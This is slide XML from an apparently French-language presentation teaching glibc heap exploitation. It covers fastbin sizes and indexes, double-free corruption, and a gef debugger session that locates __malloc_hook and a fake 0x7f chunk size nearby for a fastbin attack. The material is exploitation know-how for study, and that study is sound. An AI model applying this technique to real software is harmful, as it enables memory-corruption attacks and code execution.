        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2850664"/>
            <a:ext cx="14688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5613FF8-FF24-4127-B83C-0F58E5815861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="1916832"/>
            <a:ext cx="146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Fastbins</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Connecteur : en angle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DA6F8E-622C-4673-9F7D-3966B6E9306F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="3"/>
            <a:endCxn id="30" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3100304" y="2634640"/>
            <a:ext cx="4730651" cy="1076692"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10750"/>
            </a:avLst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4313D4E4-7C46-4318-8148-DCB5EAE903CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407018" y="2996952"/>
            <a:ext cx="1468800" cy="1428760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F70E2A-D1F7-471D-B01E-033CFEE67956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7830955" y="2996952"/>
            <a:ext cx="576064" cy="1428760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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0x20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F3EF2FB-DDFB-4927-A791-4A3F5E665C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533128" y="2414072"/>
            <a:ext cx="1044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0: 0x20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CA318BE-7F67-4791-B6CC-C3621536C3CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533128" y="2913380"/>
            <a:ext cx="1044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1: 0x30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43A7939F-0A11-475F-BCE4-3DED0B67222D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8118987" y="4581128"/>
            <a:ext cx="0" cy="4320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75BBCF7F-4166-4E86-9F2F-65DF4C494089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6870294" y="5140092"/>
            <a:ext cx="2808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0x20 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> index : 0 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1A5F5685-E6BF-4E09-9A57-E3BD846116FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3287688" y="2780928"/>
            <a:ext cx="0" cy="21602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3C1354FF-2A35-4121-BE8A-64A94CF88C2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711623" y="5152546"/>
            <a:ext cx="187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fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> index : 0 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Est égal à 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C83D7A-FFD7-4DA8-A696-AC5640C637E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5040449" y="4928714"/>
            <a:ext cx="1710387" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="mathEqual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Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BBD3DB5-DA33-4BA3-A94F-8E3ACDED8027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" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D558B86-D768-4154-9CC5-0EAB80298547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20" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72377C2D-B299-48F1-96A5-FDA541434407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1" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEA2D445-8F77-42C8-B574-2A260262CF83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2" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC88797C-B7A8-4FE0-A069-678B871C479C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31" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8928114-2045-4EC7-B4D6-30C5E237B352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93627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3" grpId="0"/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84CE9A-071F-4670-BC7D-57A1CB8E3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B55CACF-2A49-4BA2-B58F-228F1AF34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00200"/>
            <a:ext cx="4421174" cy="26928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E99E8F4-4782-4CD8-B583-E1CC04EF6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1600200"/>
            <a:ext cx="5253188" cy="269289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5CBAABF-BF05-40B3-85D4-F2477B2DF11D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="803412" y="4380637"/>
            <a:ext cx="105851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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>➤  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &amp;__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>malloc_hook</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$2 = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> *(**)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size_t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const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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> *)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x7ffff7dd3af0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>malloc_hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>➤  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>x/4gx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x7ffff7dd3af0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-27-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x7ffff7dd3acd &lt;_IO_wide_data_0+301&gt;:   0xfff7dcff00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x000000000000007f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x7ffff7dd3add: 0xfff7ab6420000000      0xfff7ab63c000007f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0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99FD704-B974-4811-83DD-8FCD1CC27151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9840416" y="5589240"/>
            <a:ext cx="0" cy="5040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C02FBF5D-4930-4B20-A924-19DC5C254223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6875750" y="6134963"/>
            <a:ext cx="531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taille valide : 0x7F =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> index 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81BC2909-1F6B-4CD1-9F3A-24DE83C577AB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BAD734BC-7EBC-4194-8242-F29C4D25399A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58607BED-E36F-4EBD-95A0-1DF3A626A9E1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Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A858A7-D93C-4787-B30F-A925437DCA42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Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5DD98A9-87EB-49C1-8FFB-8986DC2E8C87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14" name="Flèche : chevron 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0A429C2-D173-4D2E-B1DA-F104AC798C90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4053123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94C71D-2798-4C0C-8183-83241CD4B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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Double free corruption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A54C6BA-3620-4068-8EAC-A6132B336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425" y="4143193"/>
            <a:ext cx="6427978" cy="102156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7277283-580A-4F00-817A-53C89C86DCFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3772425" y="5321196"/>
            <a:ext cx="9036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64 bits =&gt; SIZE_SZ = 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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &gt;&gt; 4) –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+mj-lt"/>
              </a:rPr>
              <a:t>sz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> / 16 –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FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x7F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> =&gt; size 0x78 = (0x78 &gt;&gt; 4) - 2 = 5 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>fastbin_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt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+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/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9E2F008-7B8E-4020-A7A7-0CCACE905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663" y="2036764"/>
            <a:ext cx="6427978" cy="19203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7E52C2-C27D-4C80-8F56-9684E3C62015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736488" y="2036764"/>
            <a:ext cx="3312368" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="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317A08-1657-4A0D-B838-1243C243C637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211572" y="2207606"/>
            <a:ext cx="14688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9AB15A-E4A3-4B48-9C2B-AC7091C92264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211572" y="2639654"/>
            <a:ext cx="14688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5003B0B-6F02-4A14-96AF-9E097F8057FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211572" y="1705822"/>
            <a:ext cx="146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Fastbins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7850E52-9653-4A5D-99B9-BB4DFE2077A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113196" y="2244526"/>
            <a:ext cx="109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0: 0x20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37D1EB7-A190-453F-91A6-95200AD49E2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113271" y="2672030"/>
            <a:ext cx="109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1: 0x30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00D122-6D1B-48AA-8F88-D306D72968F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211572" y="3071702"/>
            <a:ext cx="14688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CDD5B7-9065-4CE0-BB28-A61FB449A70D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211572" y="3503750"/>
            <a:ext cx="14688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021259F-800C-47CB-AA53-97B0C4E45656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113196" y="3104078"/>
            <a:ext cx="109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2: 0x40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DB5064E-22A1-451F-8E5E-65AEDCF796B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113196" y="3536126"/>
            <a:ext cx="109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3: 0x50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B2EC0FB-CB8D-406D-B62F-1C2433B52192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211572" y="3933736"/>
            <a:ext cx="14688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090152-2C53-4A69-AEA3-BCF2662543E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211572" y="4365784"/>
            <a:ext cx="146880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1EA6066-2767-4E20-AE7A-E534C390AEEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113196" y="3963630"/>
            <a:ext cx="109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4: 0x60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DA58A3F-4AED-404D-A50C-033AF25DB147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113196" y="4397950"/>
            <a:ext cx="109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5: 0x70</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1062F95-EFCC-48F7-8EA5-D8BD9BA8B138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7" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE5BACE5-3F6A-48A0-ABC2-7FF4D3DBFCA5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28" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20FA527D-A63D-4B89-899B-BA39C192F599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9" name="Flèche : chevron 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F28261-A01D-4761-9470-E3746153780B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0" name="Flèche : chevron 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E9C61B-667B-4AAA-82EE-BE34DAE9B49A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31" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECC0E2BB-CCEC-49BC-80A3-C828090CC5B2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3BC82C49-37D8-40BA-84F4-3FE7D53F477A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75787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34DB3C-7A2E-4620-A2F9-10F234C9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3C259B8-C2BF-425C-9895-B184F8632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2132855"/>
            <a:ext cx="3969751" cy="14133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DB4BD3-9B7D-48DE-BD47-8435B62AE290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2054390" y="3747695"/>
            <a:ext cx="504056" cy="86409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 err="1"/>
              <a:t>price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F15DC9-BE51-403E-8064-26ABD0DDB371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2558446" y="3747695"/>
            <a:ext cx="1440160" cy="86409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 err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0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F7C34F5-7F1B-4B1A-871D-3C62EAED72A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2054390" y="4755807"/>
            <a:ext cx="50405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C681280-5FB4-42B2-94B7-F56CB7DA4E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2558446" y="4755807"/>
            <a:ext cx="14401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591D6B8-9771-4A4A-8B89-DF76C7303E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1550334" y="3747695"/>
            <a:ext cx="504056" cy="8640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size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FD6F371-B072-4656-95C6-03D0CECFA502}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1550334" y="4755807"/>
            <a:ext cx="50405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9CD16662-D251-4D50-9AF1-216C69064241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1609175" y="4784909"/>
            <a:ext cx="386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8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18DA26A-21C7-4619-9512-DC31F79836BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2113231" y="4784909"/>
            <a:ext cx="386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8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84B6F02-A47A-4D06-A7F5-E9B0B6BFC5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2984408" y="4784909"/>
            <a:ext cx="62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89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EF7586-8BA2-4B60-8035-A3CDF5967690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3998606" y="3747695"/>
            <a:ext cx="353954" cy="86409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fr-FR" dirty="0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D7C222B-433C-407E-B38A-867EA618C46C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3998606" y="4755807"/>
            <a:ext cx="35395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D69D9160-F7D0-4B17-B00F-13C99547A837}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3861172" y="4784909"/>
            <a:ext cx="62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7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92F4C4D-DFED-423C-A289-A4E9B3AFB5BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1517914" y="5240415"/>
            <a:ext cx="283464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1809D765-D2B3-4A6D-9045-F32F045175E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760272" y="5355691"/>
            <a:ext cx="2592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0x70 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 5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2825E8F-2DB7-4E2D-8785-A7DFD57BB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247" y="2378169"/>
            <a:ext cx="3986297" cy="2739051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03ADEC88-C358-41E4-83A9-1F3E7DE1EE11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2" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34A39822-2A55-4B53-86D5-873B5011A52D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24" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AF00D3B-4A6A-4291-B4A0-7ED11BF98C5A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5" name="Flèche : chevron 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
